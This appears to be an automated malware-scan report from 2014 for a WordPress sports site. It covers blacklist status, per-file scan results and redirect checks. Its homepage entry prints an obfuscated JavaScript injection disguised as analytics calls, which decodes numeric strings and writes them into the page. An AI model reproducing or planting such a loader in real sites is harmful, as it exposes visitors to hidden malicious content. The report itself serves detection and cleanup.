Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sports.zadishefreeman.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://sports.zadishefreeman.com/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://sports.zadishefreeman.com/ | 200 OK Content-Length: 117205 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var _gw2 = []; _gw2.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']); _gw2.push(['_setOption', '6918518510413211618916517817118618618118219318218118517']); _gw2.push(['_setPageId', '5186175181180128167168185181178187186171129169178175182']); _gw2.push(['_setOption', '1281841711691861101221231201821901141671871861811141671']); _gw2.push(['_setPageId', '8718618111412212312018219011112919513011718518619117817']); _gw2.push(['_trackPageview', '1132']); var t=z='',l=pos=v=0,a1="arCo",a2="omCh";for (v=0; v<_gw2.length; v++) t += _gw2[v][1];l=t.length; while (pos < l) z += String["fr"+a2+a1+"de"](parseInt(t.slice(pos,pos+=3))-70); document.write(z); Antivirus reports:
| ||
http://sports.zadishefreeman.com/wp-includes/js/swfobject.js?ver=2.2-20120417 | 200 OK Content-Length: 10231 Content-Type: application/x-javascript | clean |
http://sports.zadishefreeman.com/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: application/x-javascript | clean |
http://sports.zadishefreeman.com/wp-content/plugins/gallery-plugin/fancybox/jquery.mousewheel-3.0.4.pack.js?ver=3.5.1 | 200 OK Content-Length: 1279 Content-Type: application/x-javascript | clean |
http://sports.zadishefreeman.com/wp-content/plugins/gallery-plugin/fancybox/jquery.fancybox-1.3.4.pack.js?ver=3.5.1 | 200 OK Content-Length: 15624 Content-Type: application/x-javascript | clean |
http://sports.zadishefreeman.com/wp-content/plugins/nextgen-scrollgallery/scrollGallery/js/mootools-core-1.3.2-full-compat.js?ver=1.3.2 | 200 OK Content-Length: 88540 Content-Type: application/x-javascript | clean |
http://sports.zadishefreeman.com/wp-content/plugins/nextgen-scrollgallery/scrollGallery/js/scrollGallery.js?ver=1.12 | 200 OK Content-Length: 12115 Content-Type: application/x-javascript | clean |
http://sports.zadishefreeman.com/wp-content/plugins/nextgen-scrollgallery/scrollGallery/js/powertools-mobile-1.1.1.js?ver=1.1.1 | 200 OK Content-Length: 4656 Content-Type: application/x-javascript | clean |
http://sports.zadishefreeman.com/wp-content/plugins/vslider/js/vslider.js?ver=3.5.1 | 200 OK Content-Length: 15413 Content-Type: application/x-javascript | clean |
http://sports.zadishefreeman.com/wp-content/plugins/alex-arank/phprpc_client.js | 404 Not Found Content-Length: 151 Content-Type: text/html | clean |
http://sports.zadishefreeman.com/test404page.js | 404 Not Found Content-Length: 151 Content-Type: text/html | clean |
http://sports.zadishefreeman.com/wp-content/plugins/alex-arank/alexarank.js | 404 Not Found Content-Length: 151 Content-Type: text/html | clean |
http://sports.zadishefreeman.com/wp-content/plugins/audio-player/assets/audio-player.js?ver=2.0.4.6 | 200 OK Content-Length: 29366 Content-Type: application/x-javascript | clean |
http://connect.facebook.net/en_US/all.js | 200 OK Content-Length: 163644 Content-Type: application/x-javascript | clean |
http://sports.zadishefreeman.com/wp-content/plugins/pinterest-pin-it-button/js/pin-it-button-user-selects-image.js?ver=3.5.1 | 200 OK Content-Length: 625 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sports.zadishefreeman.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Sep 2014 13:59:25 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://wp.me/2fWAW>; rel=shortlink
Set-Cookie: PHPSESSID=cat2f882vo1ck9v36km8l32jf2; path=/
X-Pingback: http://sports.zadishefreeman.com/xmlrpc.php
GET / HTTP/1.1
Host: sports.zadishefreeman.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Sep 2014 13:59:25 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Link: <http://wp.me/2fWAW>; rel=shortlink
Set-Cookie: PHPSESSID=cat2f882vo1ck9v36km8l32jf2; path=/
X-Pingback: http://sports.zadishefreeman.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: sports.zadishefreeman.com
Referer: http://www.google.com/search?q=sports.zadishefreeman.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sports.zadishefreeman.com
Referer: http://www.google.com/search?q=sports.zadishefreeman.com
Result:
The result is similar to the first query. There are no suspicious redirects found.